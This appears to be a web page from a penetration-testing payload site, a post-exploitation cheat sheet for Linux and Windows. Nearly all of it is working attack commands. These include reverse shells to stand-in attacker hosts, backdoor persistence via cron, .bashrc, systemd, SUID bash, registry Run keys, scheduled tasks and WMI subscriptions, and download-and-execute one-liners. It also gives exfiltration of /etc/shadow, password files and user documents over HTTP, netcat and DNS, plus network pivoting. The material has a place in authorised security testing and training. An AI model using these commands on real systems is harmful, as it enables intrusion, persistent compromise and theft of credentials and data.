$loading...
Post-exploitation commands for shell stabilization, persistence, file transfer, data exfiltration, network pivoting, and covering tracks on Linux and Windows. (36 payloads)
# Python PTY method (most common):
python3 -c "import pty; pty.spawn('/bin/bash')"
# Or python2:
python -c "import pty; pty.spawn('/bin/bash')"
# Then in same shell:
export TERM=xterm
# Background with Ctrl+Z, then in host terminal:
stty raw -echo; fg
# Now have full PTY: tab completion, Ctrl+C, clear, etc.# script command method:
script /dev/null -c bash
# Background with Ctrl+Z, then:
stty raw -echo; fg
reset
export SHELL=bash
export TERM=xterm-256color
stty rows 38 columns 116# socat method (best quality — requires socat on target):
# On attacker:
socat file:`tty`,raw,echo=0 tcp-listen:4444
# On victim:
socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:<ATTACKER_IP>:4444# rlwrap method (quick TTY upgrade for listeners):
rlwrap nc -lvnp 4444
# Provides readline editing even in raw netcat shells# Fix terminal size after PTY upgrade:
stty rows $(tput lines) columns $(tput cols)# HTTP methods:
wget http://<IP>:<PORT>/file -O /tmp/file
curl http://<IP>:<PORT>/file -o /tmp/file
# Start HTTP server on attacker:
python3 -m http.server 80
php -S 0.0.0.0:80# Netcat file transfer:
# Receive on victim:
nc -lvnp 4444 > received_file
# Send from attacker:
nc <VICTIM_IP> 4444 < file_to_send# Base64 transfer (no special tools needed):
# On attacker:
base64 -w 0 file.exe > file.b64
cat file.b64 # copy the output
# On victim:
echo "<base64_data>" | base64 -d > /tmp/file.exe# SCP (if SSH key available):
scp file.txt <user>@<VICTIM_IP>:/tmp/
scp <user>@<VICTIM_IP>:/etc/shadow /tmp/# Python3 upload server on attacker (receive files FROM victim):
python3 -c "import http.server,socketserver; handler=http.server.SimpleHTTPRequestHandler; httpd=socketserver.TCPServer(('',8080),handler); httpd.serve_forever()"
# Or use uploadserver:
python3 -m uploadserver
# Victim uploads:
curl -F "files=@/etc/shadow" http://<IP>:8000/upload# PowerShell download:
(New-Object Net.WebClient).DownloadFile("http://<IP>/file.exe","C:\Temp\file.exe")
Invoke-WebRequest -Uri "http://<IP>/file.exe" -OutFile "C:\Temp\file.exe"
# One-liner with execution:
IEX (New-Object Net.WebClient).DownloadString("http://<IP>/script.ps1")# certutil (LOLBIN — works on all Windows versions):
certutil -urlcache -split -f "http://<IP>/file.exe" file.exe
# Encode/decode files:
certutil -encode file.exe file.b64
certutil -decode file.b64 file.exe# bitsadmin (LOLBIN):
bitsadmin /transfer job /download /priority normal "http://<IP>/file.exe" "C:\Temp\file.exe"# SMB server + copy (impacket on attacker):
python3 impacket-smbserver share /tmp -smb2support
# Windows victim:
copy \\<ATTACKER_IP>\share\file.exe C:\Temp\# Netcat on Windows:
nc.exe -lvnp 4444 > file.txt
# Or with bitsadmin to avoid network tools# Cron reverse shell:
(crontab -l 2>/dev/null; echo "* * * * * bash -i >& /dev/tcp/<IP>/4444 0>&1") | crontab -# Root cron (if writable):
echo "* * * * * root bash -i >& /dev/tcp/<IP>/4444 0>&1" >> /etc/cron.d/backdoor# SSH authorized_keys backdoor:
mkdir -p ~/.ssh && chmod 700 ~/.ssh
echo "<ATTACKER_PUBLIC_KEY>" >> ~/.ssh/authorized_keys
chmod 600 ~/.ssh/authorized_keys
# Now SSH in: ssh -i id_rsa <user>@<IP># .bashrc / .bash_profile persistence:
echo "bash -i >& /dev/tcp/<IP>/4444 0>&1 &" >> ~/.bashrc
# Triggers on every new bash session by this user# systemd service persistence (root required):
cat > /etc/systemd/system/backdoor.service << EOF
[Unit]
Description=System Monitoring Service
[Service]
Type=simple
ExecStart=/bin/bash -c "bash -i >& /dev/tcp/<IP>/4444 0>&1"
Restart=always
[Install]
WantedBy=multi-user.target
EOF
systemctl daemon-reload
systemctl enable backdoor
systemctl start backdoor# SUID bash backdoor (root required):
cp /bin/bash /tmp/.hidden_bash
chmod +s /tmp/.hidden_bash
# Later: /tmp/.hidden_bash -p# Registry autorun:
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v Backdoor /t REG_SZ /d "C:\Temp\payload.exe" /f
# Runs as current user on login
# HKLM (requires admin):
reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v Backdoor /t REG_SZ /d "C:\Temp\payload.exe" /f# Scheduled task persistence:
schtasks /create /sc onlogon /tn "WindowsUpdate" /tr "C:\Temp\payload.exe" /ru SYSTEM
schtasks /run /tn "WindowsUpdate"# Startup folder:
copy payload.exe "C:\Users\<user>\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\"
# Or All Users (admin required):
copy payload.exe "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\"# WMI event subscription (stealthy, admin required):
$Command = 'powershell.exe -nop -w hidden -c "IEX(New-Object Net.WebClient).DownloadString(\"http://<IP>/shell.ps1\")"'
$Filter = Set-WmiInstance -Namespace "root\subscription" -Class "__EventFilter" -Arguments @{Name="SystemEventFilter";EventNamespace="root\cimv2";QueryLanguage="WQL";Query="SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System' AND TargetInstance.SystemUpTime >= 120 AND TargetInstance.SystemUpTime < 180"}
$Consumer = Set-WmiInstance -Namespace "root\subscription" -Class "CommandLineEventConsumer" -Arguments @{Name="SystemConsumer";CommandLineTemplate=$Command}
$Binding = Set-WmiInstance -Namespace "root\subscription" -Class "__FilterToConsumerBinding" -Arguments @{Filter=$Filter;Consumer=$Consumer}# DLL hijacking persistence in application startup path:
# Find application that runs at startup, identify DLL it loads
# Drop malicious DLL in application directory# Netcat exfiltration:
# Receive on attacker:
nc -lvnp 4444 > exfil.tar.gz
# Send on victim:
tar czf - /home/ | nc <ATTACKER_IP> 4444# HTTP POST exfiltration:
curl -F "data=@/etc/shadow" http://<ATTACKER_IP>/upload
curl -d @/etc/passwd http://<ATTACKER_IP>/upload
# Receive with:
python3 -m uploadserver# DNS exfiltration (slow, bypasses many firewalls):
# Exfil one line at a time via DNS lookups:
cat /etc/passwd | while read line; do
data=$(echo $line | base32 | tr -d "=" | tr "[:upper:]" "[:lower:]")
nslookup $data.<ATTACKER_DOMAIN>
done
# Receive with dnscat2 or similar# Base64 in-band exfiltration (copy-paste):
base64 /etc/shadow
# Copy base64 output, decode on attacker:
echo "<copied_base64>" | base64 -d# Windows: Compress and exfil via PowerShell:
Compress-Archive -Path C:\Users\*\Documents -DestinationPath C:\Temp\docs.zip
Invoke-RestMethod -Uri "http://<ATTACKER_IP>/upload" -Method POST -InFile C:\Temp\docs.zip
-ContentType "application/octet-stream"# SSH local port forward (access internal service from attacker):
ssh -L <local_port>:<internal_host>:<internal_port> <user>@<pivot_host>
# Example — access internal web server:
ssh -L 8080:192.168.1.10:80 user@pivot.host
# Browse http://localhost:8080 on attacker# SSH remote port forward (expose attacker service on internal net):
ssh -R <remote_port>:localhost:<local_port> <user>@<pivot_host>
# Example — expose attacker Metasploit on pivot:
ssh -R 4444:localhost:4444 user@pivot.host# SSH SOCKS proxy (route all tools through pivot):
ssh -D 1080 user@pivot.host
# Configure proxychains to use 127.0.0.1:1080
proxychains nmap -sT 192.168.1.0/24# chisel server (on attacker):
./chisel server --port 8080 --reverse
# chisel client (on victim):
./chisel client <ATTACKER_IP>:8080 R:socks
# Creates SOCKS5 proxy on attacker port 1080# socat TCP relay (pivot without SSH):
# On pivot — relay port 4444 to attacker:
socat tcp-listen:4444,fork,reuseaddr tcp:<ATTACKER_IP>:4444
# Victim connects to pivot:
bash -i >& /dev/tcp/<PIVOT_IP>/4444 0>&1Level up your security testing
Install the CLI
npx payload-playgroundExplore All Tools
Encoding, hashing, JWT & more
Browse Cheat Sheets
Quick-reference payload guides